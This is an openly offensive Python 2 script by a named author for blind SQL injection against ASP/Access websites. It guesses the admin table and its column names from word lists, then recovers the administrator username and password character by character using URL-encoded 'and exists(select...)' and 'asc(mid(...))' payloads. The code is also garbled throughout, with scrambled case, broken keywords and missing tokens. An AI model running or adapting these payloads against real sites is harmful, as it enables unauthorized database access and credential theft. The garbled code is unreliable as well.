#! / usr / bin / python # asp access sql injection test # www.xloading.com www.cnpy.org # Written by Totododo (QQ: 8924007) Email: Osbbs@msn.com from sys import exit from Urllib Import URLOPEN FROM String Import Join, Strip from Reimport Search Def get_tablename (): TableFile = Open ("Table.txt") for line in TableFile.Readline (): line = strip (line) SQL = JOIN (['% 20and% 20Exists% 20 (select% 20 *% 20FROM% 20 ', line,') '],' ') URLFILE = URLOPEN (URL SQL) HTMLCODES = URLFILE.READ () IF Not Search (Judge, Htmlcodes): Print "error: ", LINE ELSE: Print" Found The Admin Table Name: ", LINE," / N "Print" Now! Start to get name color ", line," table "get_namecolumn (line) print" Now! Start to get password column from ", line," table "get_passwordcolumn (line) break def get_namecolumn (tablename): namecolumn = open (" namecolumn.txt ") for namecolumnline in namecolumn.readlines (): namecolumnline = strip (namecolumnline) sql = join ([ '% 20And% 20EXISTS% 20 (select% 20', NameColumnLine, '% 20From% 20', Tablename, ')'], '') URLFILE = URLOPEN (UR l sql) htmlcodes = urlfile.read () if not search (judge, htmlcodes): print "Error:", namecolumnline else: print "Found the name column from admin table:", namecolumnline, "/ n" get_usernamelenth (tablename , namecolumnline) break def get_passwordcolumn (tablename): passwordcolumn = open ( "passwordcolumn.txt") for passwordcolumnline in passwordcolumn.readlines (): passwordcolumnline = strip (passwordcolumnline) sql = join ([ '% 20and% 20exists% 20 (select% 20 ', PasswordColumnline,'% 20From% 20 ', TableName,') '],' '
) Urlfile = urlopen (url sql) htmlcodes = urlfile.read () if not search (judge, htmlcodes): print "Error:", passwordcolumnline else: print "Found the password column from admin table:", passwordcolumnline, "/ n "get_passwordful (TableName, PasswordColumnLine) Break def Get_usernamelenth (TableName, NameColumn): for x in = JOIN (['% 20And% 201 = (Select% 20top% 201% 20count (*)% 20FROM% 20 ', Tablename,'% 20where% 20LEN (', NameColumn,') = ', str (x),') '],' ') URLFILE = URLOPEN (URL SQL) HTMLCODES = URLFILE.READ () if not search (judge, htmlcodes): print "Error:", x else: print "Found the lenth of the username:", x, "/ n" get_username (tablename, namecolumn, x) break def get_passwordlenth (tablename, passwordcolumn : for x in range (1,51): SQL = JOIN (['% 20And% 201 = (SELECT% 20top% 201% 20count (*)% 20FROM% 20', Tablename, '% 20where% 20LEN (', PasswordColumn, ') =', str (x), ')'], '') URLFILE = URLOPEN (URL SQL) HTMLCODES = URLFILE.READ () IF Not Search (Judge, Htmlcodes): Print "Error:", X else: Print "Found The Lenth of the Password:", X, "/ n" get_password (Tablename, PasswordColumn, x) Break def Get_username (TableName, NameColumn, LENTH): list = [] for x [Range (48, 58), Range (97, 123), Range (65,91 ), Range (33, 48), Range (91, 97), Range (123, 256), RANGE (1, 33)]: list.extend (x) Global username UserName = 'for y In Range (1, LENTH 1): Print "Now! CRACK THE LEFT", Y, "of the username", "waiting ~~~~~~~" for z in list: SQL = JOIN ([["% 20and % 201 = (Select% 20tOp% 201% 20count (*)% 20FROM% 20 ", TableName,"
% 20where% 20ASC (MID (", NameColumn,", ", STR (Y),", "1)) =", STR (Z), ")"], '') URLFILE = URLOPEN (URL SQL) HTMLCODES = URLFILE.READ () if Search (Judge, Htmlcodes): username = JOIN ([UserName, Chr (z)], '') Break Print "Found the username =:", username, "/ n" DEF Get_password (Tablename, PasswordColumn, Lenth): list = [] for x in [ing (48, 58), Range (97, 123), Range (33, 48), Range (58, 65), Range (123, 256), Range (1,33)]: list.extend (x) Global Password Password = '' for y in ino (1, LENTH 1): Print "Now! CRACK THE Left ", y," of the password "," waiting ~~~~~~~ "for z in list: SQL = JOIN (["% 20And% 201 = (SELECT% 20top% 201% 20count (*)% 20FROM % 20 ", TABLENAME,"% 20where% 20ASC (MID (", PasswordColumn,", ", STR (Y),", "1)) =", Str (Z), ")"], '' URLFILE = URLOPEN (URL SQL) HTMLCODES = URLFILE.READ () IF Search (Judge, Htmlcodes): Password = Join ([Password, Chr (z)], '') Break Print "Found the password =:", Password, "/ n" print "/ n ############################################ ########################## "" ASP Access SQL Injection Scripts by Totodo with Python 2.3.X (QQ: 8924007) "Print" www.xloading.com www.cnpy.org "print" email: osbbs@msn.com/n "print" ======== ============================================================================================================================================================================================================= ======
